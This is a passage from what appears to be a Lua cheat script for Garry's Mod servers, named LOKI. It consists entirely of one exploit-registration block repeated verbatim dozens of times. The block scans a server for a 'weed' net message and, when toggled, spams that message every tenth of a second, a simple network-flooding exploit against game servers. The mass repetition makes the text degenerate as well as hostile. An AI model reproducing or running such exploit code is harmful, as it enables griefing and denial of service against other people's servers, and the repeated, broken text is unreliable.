  7444. net.WriteString( "DUDE" )
  7445. net.SendToServer()
  7446. end)
  7447. else
  7448. timer.Remove( "loki_bonghit" )
  7449. end
  7450. end, },
  7451. },
  7452. } )
  7453.  
  7454. LOKI.AddExploit( "Dude Weed Lmao", {
  7455. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7456. severity = 1,
  7457. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7458. functions = {
  7459. { typ = "func", name = "Big Weed", func = function()
  7460. if !timer.Exists( "loki_bonghit" ) then
  7461. timer.Create( "loki_bonghit", 0.1, 0, function()
  7462. net.Start( "weed" )
  7463. net.WriteString( "DUDE" )
  7464. net.SendToServer()
  7465. end)
  7466. else
  7467. timer.Remove( "loki_bonghit" )
  7468. end
  7469. end, },
  7470. },
  7471. } )
  7472.  
  7473. LOKI.AddExploit( "Dude Weed Lmao", {
  7474. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7475. severity = 1,
  7476. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7477. functions = {
  7478. { typ = "func", name = "Big Weed", func = function()
  7479. if !timer.Exists( "loki_bonghit" ) then
  7480. timer.Create( "loki_bonghit", 0.1, 0, function()
  7481. net.Start( "weed" )
  7482. net.WriteString( "DUDE" )
  7483. net.SendToServer()
  7484. end)
  7485. else
  7486. timer.Remove( "loki_bonghit" )
  7487. end
  7488. end, },
  7489. },
  7490. } )
  7491.  
  7492. LOKI.AddExploit( "Dude Weed Lmao", {
  7493. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7494. severity = 1,
  7495. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7496. functions = {
  7497. { typ = "func", name = "Big Weed", func = function()
  7498. if !timer.Exists( "loki_bonghit" ) then
  7499. timer.Create( "loki_bonghit", 0.1, 0, function()
  7500. net.Start( "weed" )
  7501. net.WriteString( "DUDE" )
  7502. net.SendToServer()
  7503. end)
  7504. else
  7505. timer.Remove( "loki_bonghit" )
  7506. end
  7507. end, },
  7508. },
  7509. } )
  7510.  
  7511. LOKI.AddExploit( "Dude Weed Lmao", {
  7512. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7513. severity = 1,
  7514. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7515. functions = {
  7516. { typ = "func", name = "Big Weed", func = function()
  7517. if !timer.Exists( "loki_bonghit" ) then
  7518. timer.Create( "loki_bonghit", 0.1, 0, function()
  7519. net.Start( "weed" )
  7520. net.WriteString( "DUDE" )
  7521. net.SendToServer()
  7522. end)
  7523. else
  7524. timer.Remove( "loki_bonghit" )
  7525. end
  7526. end, },
  7527. },
  7528. } )
  7529.  
  7530. LOKI.AddExploit( "Dude Weed Lmao", {
  7531. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7532. severity = 1,
  7533. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7534. functions = {
  7535. { typ = "func", name = "Big Weed", func = function()
  7536. if !timer.Exists( "loki_bonghit" ) then
  7537. timer.Create( "loki_bonghit", 0.1, 0, function()
  7538. net.Start( "weed" )
  7539. net.WriteString( "DUDE" )
  7540. net.SendToServer()
  7541. end)
  7542. else
  7543. timer.Remove( "loki_bonghit" )
  7544. end
  7545. end, },
  7546. },
  7547. } )
  7548.  
  7549. LOKI.AddExploit( "Dude Weed Lmao", {
  7550. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7551. severity = 1,
  7552. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7553. functions = {
  7554. { typ = "func", name = "Big Weed", func = function()
  7555. if !timer.Exists( "loki_bonghit" ) then
  7556. timer.Create( "loki_bonghit", 0.1, 0, function()
  7557. net.Start( "weed" )
  7558. net.WriteString( "DUDE" )
  7559. net.SendToServer()
  7560. end)
  7561. else
  7562. timer.Remove( "loki_bonghit" )
  7563. end
  7564. end, },
  7565. },
  7566. } )
  7567.  
  7568. LOKI.AddExploit( "Dude Weed Lmao", {
  7569. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7570. severity = 1,
  7571. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7572. functions = {
  7573. { typ = "func", name = "Big Weed", func = function()
  7574. if !timer.Exists( "loki_bonghit" ) then
  7575. timer.Create( "loki_bonghit", 0.1, 0, function()
  7576. net.Start( "weed" )
  7577. net.WriteString( "DUDE" )
  7578. net.SendToServer()
  7579. end)
  7580. else
  7581. timer.Remove( "loki_bonghit" )
  7582. end
  7583. end, },
  7584. },
  7585. } )
  7586.  
  7587. LOKI.AddExploit( "Dude Weed Lmao", {
  7588. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7589. severity = 1,
  7590. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7591. functions = {
  7592. { typ = "func", name = "Big Weed", func = function()
  7593. if !timer.Exists( "loki_bonghit" ) then
  7594. timer.Create( "loki_bonghit", 0.1, 0, function()
  7595. net.Start( "weed" )
  7596. net.WriteString( "DUDE" )
  7597. net.SendToServer()
  7598. end)
  7599. else
  7600. timer.Remove( "loki_bonghit" )
  7601. end
  7602. end, },
  7603. },
  7604. } )
  7605.  
  7606. LOKI.AddExploit( "Dude Weed Lmao", {
  7607. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7608. severity = 1,
  7609. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7610. functions = {
  7611. { typ = "func", name = "Big Weed", func = function()
  7612. if !timer.Exists( "loki_bonghit" ) then
  7613. timer.Create( "loki_bonghit", 0.1, 0, function()
  7614. net.Start( "weed" )
  7615. net.WriteString( "DUDE" )
  7616. net.SendToServer()
  7617. end)
  7618. else
  7619. timer.Remove( "loki_bonghit" )
  7620. end
  7621. end, },
  7622. },
  7623. } )
  7624.  
  7625. LOKI.AddExploit( "Dude Weed Lmao", {
  7626. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7627. severity = 1,
  7628. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7629. functions = {
  7630. { typ = "func", name = "Big Weed", func = function()
  7631. if !timer.Exists( "loki_bonghit" ) then
  7632. timer.Create( "loki_bonghit", 0.1, 0, function()
  7633. net.Start( "weed" )
  7634. net.WriteString( "DUDE" )
  7635. net.SendToServer()
  7636. end)
  7637. else
  7638. timer.Remove( "loki_bonghit" )
  7639. end
  7640. end, },
  7641. },
  7642. } )
  7643.  
  7644. LOKI.AddExploit( "Dude Weed Lmao", {
  7645. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7646. severity = 1,
  7647. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7648. functions = {
  7649. { typ = "func", name = "Big Weed", func = function()
  7650. if !timer.Exists( "loki_bonghit" ) then
  7651. timer.Create( "loki_bonghit", 0.1, 0, function()
  7652. net.Start( "weed" )
  7653. net.WriteString( "DUDE" )
  7654. net.SendToServer()
  7655. end)
  7656. else
  7657. timer.Remove( "loki_bonghit" )
  7658. end
  7659. end, },
  7660. },
  7661. } )
  7662.  
  7663. LOKI.AddExploit( "Dude Weed Lmao", {
  7664. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7665. severity = 1,
  7666. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7667. functions = {
  7668. { typ = "func", name = "Big Weed", func = function()
  7669. if !timer.Exists( "loki_bonghit" ) then
  7670. timer.Create( "loki_bonghit", 0.1, 0, function()
  7671. net.Start( "weed" )
  7672. net.WriteString( "DUDE" )
  7673. net.SendToServer()
  7674. end)
  7675. else
  7676. timer.Remove( "loki_bonghit" )
  7677. end
  7678. end, },
  7679. },
  7680. } )
  7681.  
  7682. LOKI.AddExploit( "Dude Weed Lmao", {
  7683. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7684. severity = 1,
  7685. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7686. functions = {
  7687. { typ = "func", name = "Big Weed", func = function()
  7688. if !timer.Exists( "loki_bonghit" ) then
  7689. timer.Create( "loki_bonghit", 0.1, 0, function()
  7690. net.Start( "weed" )
  7691. net.WriteString( "DUDE" )
  7692. net.SendToServer()
  7693. end)
  7694. else
  7695. timer.Remove( "loki_bonghit" )
  7696. end
  7697. end, },
  7698. },
  7699. } )
  7700.  
  7701. LOKI.AddExploit( "Dude Weed Lmao", {
  7702. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7703. severity = 1,
  7704. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7705. functions = {
  7706. { typ = "func", name = "Big Weed", func = function()
  7707. if !timer.Exists( "loki_bonghit" ) then
  7708. timer.Create( "loki_bonghit", 0.1, 0, function()
  7709. net.Start( "weed" )
  7710. net.WriteString( "DUDE" )
  7711. net.SendToServer()
  7712. end)
  7713. else
  7714. timer.Remove( "loki_bonghit" )
  7715. end
  7716. end, },
  7717. },
  7718. } )
  7719.  
  7720. LOKI.AddExploit( "Dude Weed Lmao", {
  7721. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7722. severity = 1,
  7723. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7724. functions = {
  7725. { typ = "func", name = "Big Weed", func = function()
  7726. if !timer.Exists( "loki_bonghit" ) then
  7727. timer.Create( "loki_bonghit", 0.1, 0, function()
  7728. net.Start( "weed" )
  7729. net.WriteString( "DUDE" )
  7730. net.SendToServer()
  7731. end)
  7732. else
  7733. timer.Remove( "loki_bonghit" )
  7734. end
  7735. end, },
  7736. },
  7737. } )
  7738.  
  7739. LOKI.AddExploit( "Dude Weed Lmao", {
  7740. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7741. severity = 1,
  7742. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7743. functions = {
  7744. { typ = "func", name = "Big Weed", func = function()
  7745. if !timer.Exists( "loki_bonghit" ) then
  7746. timer.Create( "loki_bonghit", 0.1, 0, function()
  7747. net.Start( "weed" )
  7748. net.WriteString( "DUDE" )
  7749. net.SendToServer()
  7750. end)
  7751. else
  7752. timer.Remove( "loki_bonghit" )
  7753. end
  7754. end, },
  7755. },
  7756. } )
  7757.  
  7758. LOKI.AddExploit( "Dude Weed Lmao", {
  7759. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7760. severity = 1,
  7761. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7762. functions = {
  7763. { typ = "func", name = "Big Weed", func = function()
  7764. if !timer.Exists( "loki_bonghit" ) then
  7765. timer.Create( "loki_bonghit", 0.1, 0, function()
  7766. net.Start( "weed" )
  7767. net.WriteString( "DUDE" )
  7768. net.SendToServer()
  7769. end)
  7770. else
  7771. timer.Remove( "loki_bonghit" )
  7772. end
  7773. end, },
  7774. },
  7775. } )
  7776.  
  7777. LOKI.AddExploit( "Dude Weed Lmao", {
  7778. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7779. severity = 1,
  7780. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7781. functions = {
  7782. { typ = "func", name = "Big Weed", func = function()
  7783. if !timer.Exists( "loki_bonghit" ) then
  7784. timer.Create( "loki_bonghit", 0.1, 0, function()
  7785. net.Start( "weed" )
  7786. net.WriteString( "DUDE" )
  7787. net.SendToServer()
  7788. end)
  7789. else
  7790. timer.Remove( "loki_bonghit" )
  7791. end
  7792. end, },
  7793. },
  7794. } )
  7795.  
  7796. LOKI.AddExploit( "Dude Weed Lmao", {
  7797. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7798. severity = 1,
  7799. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7800. functions = {
  7801. { typ = "func", name = "Big Weed", func = function()
  7802. if !timer.Exists( "loki_bonghit" ) then
  7803. timer.Create( "loki_bonghit", 0.1, 0, function()
  7804. net.Start( "weed" )
  7805. net.WriteString( "DUDE" )
  7806. net.SendToServer()
  7807. end)
  7808. else
  7809. timer.Remove( "loki_bonghit" )
  7810. end
  7811. end, },
  7812. },
  7813. } )
  7814.  
  7815. LOKI.AddExploit( "Dude Weed Lmao", {
  7816. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7817. severity = 1,
  7818. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7819. functions = {
  7820. { typ = "func", name = "Big Weed", func = function()
  7821. if !timer.Exists( "loki_bonghit" ) then
  7822. timer.Create( "loki_bonghit", 0.1, 0, function()
  7823. net.Start( "weed" )
  7824. net.WriteString( "DUDE" )
  7825. net.SendToServer()
  7826. end)
  7827. else
  7828. timer.Remove( "loki_bonghit" )
  7829. end
  7830. end, },
  7831. },
  7832. } )
  7833.  
  7834. LOKI.AddExploit( "Dude Weed Lmao", {
  7835. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7836. severity = 1,
  7837. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7838. functions = {
  7839. { typ = "func", name = "Big Weed", func = function()
  7840. if !timer.Exists( "loki_bonghit" ) then
  7841. timer.Create( "loki_bonghit", 0.1, 0, function()
  7842. net.Start( "weed" )
  7843. net.WriteString( "DUDE" )
  7844. net.SendToServer()
  7845. end)
  7846. else
  7847. timer.Remove( "loki_bonghit" )
  7848. end
  7849. end, },
  7850. },
  7851. } )
  7852.  
  7853. LOKI.AddExploit( "Dude Weed Lmao", {
  7854. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7855. severity = 1,
  7856. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7857. functions = {
  7858. { typ = "func", name = "Big Weed", func = function()
  7859. if !timer.Exists( "loki_bonghit" ) then
  7860. timer.Create( "loki_bonghit", 0.1, 0, function()
  7861. net.Start( "weed" )
  7862. net.WriteString( "DUDE" )
  7863. net.SendToServer()
  7864. end)
  7865. else
  7866. timer.Remove( "loki_bonghit" )
  7867. end
  7868. end, },
  7869. },
  7870. } )
  7871.  
  7872. LOKI.AddExploit( "Dude Weed Lmao", {
  7873. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7874. severity = 1,
  7875. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7876. functions = {
  7877. { typ = "func", name = "Big Weed", func = function()
  7878. if !timer.Exists( "loki_bonghit" ) then
  7879. timer.Create( "loki_bonghit", 0.1, 0, function()
  7880. net.Start( "weed" )
  7881. net.WriteString( "DUDE" )
  7882. net.SendToServer()
  7883. end)
  7884. else
  7885. timer.Remove( "loki_bonghit" )
  7886. end
  7887. end, },
  7888. },
  7889. } )
  7890.  
  7891. LOKI.AddExploit( "Dude Weed Lmao", {
  7892. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7893. severity = 1,
  7894. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7895. functions = {
  7896. { typ = "func", name = "Big Weed", func = function()
  7897. if !timer.Exists( "loki_bonghit" ) then
  7898. timer.Create( "loki_bonghit", 0.1, 0, function()
  7899. net.Start( "weed" )
  7900. net.WriteString( "DUDE" )
  7901. net.SendToServer()
  7902. end)
  7903. else
  7904. timer.Remove( "loki_bonghit" )
  7905. end
  7906. end, },
  7907. },
  7908. } )
  7909.  
  7910. LOKI.AddExploit( "Dude Weed Lmao", {
  7911. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7912. severity = 1,
  7913. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7914. functions = {
  7915. { typ = "func", name = "Big Weed", func = function()
  7916. if !timer.Exists( "loki_bonghit" ) then
  7917. timer.Create( "loki_bonghit", 0.1, 0, function()
  7918. net.Start( "weed" )
  7919. net.WriteString( "DUDE" )
  7920. net.SendToServer()
  7921. end)
  7922. else
  7923. timer.Remove( "loki_bonghit" )
  7924. end
  7925. end, },
  7926. },
  7927. } )
  7928.  
  7929. LOKI.AddExploit( "Dude Weed Lmao", {
  7930. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7931. severity = 1,
  7932. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7933. functions = {
  7934. { typ = "func", name = "Big Weed", func = function()
  7935. if !timer.Exists( "loki_bonghit" ) then
  7936. timer.Create( "loki_bonghit", 0.1, 0, function()
  7937. net.Start( "weed" )
  7938. net.WriteString( "DUDE" )
  7939. net.SendToServer()
  7940. end)
  7941. else
  7942. timer.Remove( "loki_bonghit" )
  7943. end
  7944. end, },
  7945. },
  7946. } )
  7947.  
  7948. LOKI.AddExploit( "Dude Weed Lmao", {
  7949. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7950. severity = 1,
  7951. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7952. functions = {
  7953. { typ = "func", name = "Big Weed", func = function()
  7954. if !timer.Exists( "loki_bonghit" ) then
  7955. timer.Create( "loki_bonghit", 0.1, 0, function()
  7956. net.Start( "weed" )
  7957. net.WriteString( "DUDE" )
  7958. net.SendToServer()
  7959. end)
  7960. else
  7961. timer.Remove( "loki_bonghit" )
  7962. end
  7963. end, },
  7964. },
  7965. } )
  7966.  
  7967. LOKI.AddExploit( "Dude Weed Lmao", {
  7968. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7969. severity = 1,
  7970. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7971. functions = {
  7972. { typ = "func", name = "Big Weed", func = function()
  7973. if !timer.Exists( "loki_bonghit" ) then
  7974. timer.Create( "loki_bonghit", 0.1, 0, function()
  7975. net.Start( "weed" )
  7976. net.WriteString( "DUDE" )
  7977. net.SendToServer()
  7978. end)
  7979. else
  7980. timer.Remove( "loki_bonghit" )
  7981. end
  7982. end, },
  7983. },
  7984. } )
  7985.  
  7986. LOKI.AddExploit( "Dude Weed Lmao", {
  7987. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7988. severity = 1,
  7989. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7990. functions = {
  7991. { typ = "func", name = "Big Weed", func = function()
  7992. if !timer.Exists( "loki_bonghit" ) then
  7993. timer.Create( "loki_bonghit", 0.1, 0, function()
  7994. net.Start( "weed" )
  7995. net.WriteString( "DUDE" )
  7996. net.SendToServer()
  7997. end)
  7998. else
  7999. timer.Remove( "loki_bonghit" )
  8000. end
  8001. end, },
  8002. },
  8003. } )
  8004.  
  8005. LOKI.AddExploit( "Dude Weed Lmao", {
  8006. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8007. severity = 1,
  8008. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8009. functions = {
  8010. { typ = "func", name = "Big Weed", func = function()
  8011. if !timer.Exists( "loki_bonghit" ) then
  8012. timer.Create( "loki_bonghit", 0.1, 0, function()
  8013. net.Start( "weed" )
  8014. net.WriteString( "DUDE" )
  8015. net.SendToServer()
  8016. end)
  8017. else
  8018. timer.Remove( "loki_bonghit" )
  8019. end
  8020. end, },
  8021. },
  8022. } )
  8023.  
  8024. LOKI.AddExploit( "Dude Weed Lmao", {
  8025. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8026. severity = 1,
  8027. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8028. functions = {
  8029. { typ = "func", name = "Big Weed", func = function()
  8030. if !timer.Exists( "loki_bonghit" ) then
  8031. timer.Create( "loki_bonghit", 0.1, 0, function()
  8032. net.Start( "weed" )
  8033. net.WriteString( "DUDE" )
  8034. net.SendToServer()
  8035. end)
  8036. else
  8037. timer.Remove( "loki_bonghit" )
  8038. end
  8039. end, },
  8040. },
  8041. } )
  8042.  
  8043. LOKI.AddExploit( "Dude Weed Lmao", {
  8044. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8045. severity = 1,
  8046. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8047. functions = {
  8048. { typ = "func", name = "Big Weed", func = function()
  8049. if !timer.Exists( "loki_bonghit" ) then
  8050. timer.Create( "loki_bonghit", 0.1, 0, function()
  8051. net.Start( "weed" )
  8052. net.WriteString( "DUDE" )
  8053. net.SendToServer()
  8054. end)
  8055. else
  8056. timer.Remove( "loki_bonghit" )
  8057. end
  8058. end, },
  8059. },
  8060. } )
  8061.  
  8062. LOKI.AddExploit( "Dude Weed Lmao", {
  8063. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8064. severity = 1,
  8065. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8066. functions = {
  8067. { typ = "func", name = "Big Weed", func = function()
  8068. if !timer.Exists( "loki_bonghit" ) then
  8069. timer.Create( "loki_bonghit", 0.1, 0, function()
  8070. net.Start( "weed" )
  8071. net.WriteString( "DUDE" )
  8072. net.SendToServer()
  8073. end)
  8074. else
  8075. timer.Remove( "loki_bonghit" )
  8076. end
  8077. end, },
  8078. },
  8079. } )
  8080.  
  8081. LOKI.AddExploit( "Dude Weed Lmao", {
  8082. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8083. severity = 1,
  8084. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8085. functions = {
  8086. { typ = "func", name = "Big Weed", func = function()
  8087. if !timer.Exists( "loki_bonghit" ) then
  8088. timer.Create( "loki_bonghit", 0.1, 0, function()
  8089. net.Start( "weed" )
  8090. net.WriteString( "DUDE" )
  8091. net.SendToServer()
  8092. end)
  8093. else
  8094. timer.Remove( "loki_bonghit" )
  8095. end
  8096. end, },
  8097. },
  8098. } )
  8099.  
  8100. LOKI.AddExploit( "Dude Weed Lmao", {
  8101. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8102. severity = 1,
  8103. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8104. functions = {
  8105. { typ = "func", name = "Big Weed", func = function()
  8106. if !timer.Exists( "loki_bonghit" ) then
  8107. timer.Create( "loki_bonghit", 0.1, 0, function()
  8108. net.Start( "weed" )
  8109. net.WriteString( "DUDE" )
  8110. net.SendToServer()
  8111. end)
  8112. else
  8113. timer.Remove( "loki_bonghit" )
  8114. end
  8115. end, },
  8116. },
  8117. } )
  8118.  
  8119. LOKI.AddExploit( "Dude Weed Lmao", {
  8120. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8121. severity = 1,
  8122. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8123. functions = {
  8124. { typ = "func", name = "Big Weed", func = function()
  8125. if !timer.Exists( "loki_bonghit" ) then
  8126. timer.Create( "loki_bonghit", 0.1, 0, function()
  8127. net.Start( "weed" )
  8128. net.WriteString( "DUDE" )
  8129. net.SendToServer()
  8130. end)
  8131. else
  8132. timer.Remove( "loki_bonghit" )
  8133. end
  8134. end, },
  8135. },
  8136. } )
  8137.  
  8138. LOKI.AddExploit( "Dude Weed Lmao", {
  8139. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8140. severity = 1,
  8141. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8142. functions = {
  8143. { typ = "func", name = "Big Weed", func = function()
  8144. if !timer.Exists( "loki_bonghit" ) then
  8145. timer.Create( "loki_bonghit", 0.1, 0, function()
  8146. net.Start( "weed" )
  8147. net.WriteString( "DUDE" )
  8148. net.SendToServer()
  8149. end)
  8150. else
  8151. timer.Remove( "loki_bonghit" )
  8152. end
  8153. end, },
  8154. },
  8155. } )
  8156.  
  8157. LOKI.AddExploit( "Dude Weed Lmao", {
  8158. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8159. severity = 1,
  8160. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8161. functions = {
  8162. { typ = "func", name = "Big Weed", func = function()
  8163. if !timer.Exists( "loki_bonghit" ) then
  8164. timer.Create( "loki_bonghit", 0.1, 0, function()
  8165. net.Start( "weed" )
  8166. net.WriteString( "DUDE" )
  8167. net.SendToServer()
  8168. end)
  8169. else
  8170. timer.Remove( "loki_bonghit" )
  8171. end
  8172. end, },
  8173. },
  8174. } )
  8175.  
  8176. LOKI.AddExploit( "Dude Weed Lmao", {
  8177. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8178. severity = 1,
  8179. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8180. functions = {
  8181. { typ = "func", name = "Big Weed", func = function()
  8182. if !timer.Exists( "loki_bonghit" ) then
  8183. timer.Create( "loki_bonghit", 0.1, 0, function()
  8184. net.Start( "weed" )
  8185. net.WriteString( "DUDE" )
  8186. net.SendToServer()
  8187. end)
  8188. else
  8189. timer.Remove( "loki_bonghit" )
  8190. end
  8191. end, },
  8192. },
  8193. } )
  8194.  
  8195. LOKI.AddExploit( "Dude Weed Lmao", {
  8196. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8197. severity = 1,
  8198. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8199. functions = {
  8200. { typ = "func", name = "Big Weed", func = function()
  8201. if !timer.Exists( "loki_bonghit" ) then
  8202. timer.Create( "loki_bonghit", 0.1, 0, function()
  8203. net.Start( "weed" )
  8204. net.WriteString( "DUDE" )
  8205. net.SendToServer()
  8206. end)
  8207. else
  8208. timer.Remove( "loki_bonghit" )
  8209. end
  8210. end, },
  8211. },
  8212. } )
  8213.  
  8214. LOKI.AddExploit( "Dude Weed Lmao", {
  8215. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8216. severity = 1,
  8217. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8218. functions = {
  8219. { typ = "func", name = "Big Weed", func = function()
  8220. if !timer.Exists( "loki_bonghit" ) then
  8221. timer.Create( "loki_bonghit", 0.1, 0, function()
  8222. net.Start( "weed" )
  8223. net.WriteString( "DUDE" )
  8224. net.SendToServer()
  8225. end)
  8226. else
  8227. timer.Remove( "loki_bonghit" )
  8228. end
  8229. end, },
  8230. },
  8231. } )
  8232.  
  8233. LOKI.AddExploit( "Dude Weed Lmao", {
  8234. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8235. severity = 1,
  8236. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8237. functions = {
  8238. { typ = "func", name = "Big Weed", func = function()
  8239. if !timer.Exists( "loki_bonghit" ) then
  8240. timer.Create( "loki_bonghit", 0.1, 0, function()
  8241. net.Start( "weed" )
  8242. net.WriteString( "DUDE" )
  8243. net.SendToServer()
  8244. end)
  8245. else
  8246. timer.Remove( "loki_bonghit" )
  8247. end
  8248. end, },
  8249. },
  8250. } )
  8251.  
  8252. LOKI.AddExploit( "Dude Weed Lmao", {
  8253. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8254. severity = 1,
  8255. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8256. functions = {
  8257. { typ = "func", name = "Big Weed", func = function()
  8258. if !timer.Exists( "loki_bonghit" ) then
  8259. timer.Create( "loki_bonghit", 0.1, 0, function()
  8260. net.Start( "weed" )
  8261. net.WriteString( "DUDE" )
  8262. net.SendToServer()
  8263. end)
  8264. else
  8265. timer.Remove( "loki_bonghit" )
  8266. end
  8267. end, },
  8268. },
  8269. } )
  8270.  
  8271. LOKI.AddExploit( "Dude Weed Lmao", {
  8272. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8273. severity = 1,
  8274. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8275. functions = {
  8276. { typ = "func", name = "Big Weed", func = function()
  8277. if !timer.Exists( "loki_bonghit" ) then
  8278. timer.Create( "loki_bonghit", 0.1, 0, function()
  8279. net.Start( "weed" )
  8280. net.WriteString( "DUDE" )
  8281. net.SendToServer()
  8282. end)
  8283. else
  8284. timer.Remove( "loki_bonghit" )
  8285. end
  8286. end, },
  8287. },
  8288. } )
  8289.  
  8290. LOKI.AddExploit( "Dude Weed Lmao", {
  8291. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8292. severity = 1,
  8293. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8294. functions = {
  8295. { typ = "func", name = "Big Weed", func = function()
  8296. if !timer.Exists( "loki_bonghit" ) then
  8297. timer.Create( "loki_bonghit", 0.1, 0, function()
  8298. net.Start( "weed" )
  8299. net.WriteString( "DUDE" )
  8300. net.SendToServer()
  8301. end)
  8302. else
  8303. timer.Remove( "loki_bonghit" )
  8304. end
  8305. end, },
  8306. },
  8307. } )
  8308.  
  8309. LOKI.AddExploit( "Dude Weed Lmao", {
  8310. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8311. severity = 1,
  8312. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8313. functions = {
  8314. { typ = "func", name = "Big Weed", func = function()
  8315. if !timer.Exists( "loki_bonghit" ) then
  8316. timer.Create( "loki_bonghit", 0.1, 0, function()
  8317. net.Start( "weed" )
  8318. net.WriteString( "DUDE" )
  8319. net.SendToServer()
  8320. end)
  8321. else
  8322. timer.Remove( "loki_bonghit" )
  8323. end
  8324. end, },
  8325. },
  8326. } )
  8327.  
  8328. LOKI.AddExploit( "Dude Weed Lmao", {
  8329. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8330. severity = 1,
  8331. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8332. functions = {
  8333. { typ = "func", name = "Big Weed", func = function()
  8334. if !timer.Exists( "loki_bonghit" ) then
  8335. timer.Create( "loki_bonghit", 0.1, 0, function()
  8336. net.Start( "weed" )
  8337. net.WriteString( "DUDE" )
  8338. net.SendToServer()
  8339. end)
  8340. else
  8341. timer.Remove( "loki_bonghit" )
  8342. end
  8343. end, },
  8344. },
  8345. } )
  8346.  
  8347. LOKI.AddExploit( "Dude Weed Lmao", {
  8348. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8349. severity = 1,
  8350. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8351. functions = {
  8352. { typ = "func", name = "Big Weed", func = function()
  8353. if !timer.Exists( "loki_bonghit" ) then
  8354. timer.Create( "loki_bonghit", 0.1, 0, function()
  8355. net.Start( "weed" )
  8356. net.WriteString( "DUDE" )
  8357. net.SendToServer()
  8358. end)
  8359. else
  8360. timer.Remove( "loki_bonghit" )
  8361. end
  8362. end, },
  8363. },
  8364. } )
  8365.  
  8366. LOKI.AddExploit( "Dude Weed Lmao", {
  8367. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8368. severity = 1,
  8369. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8370. functions = {
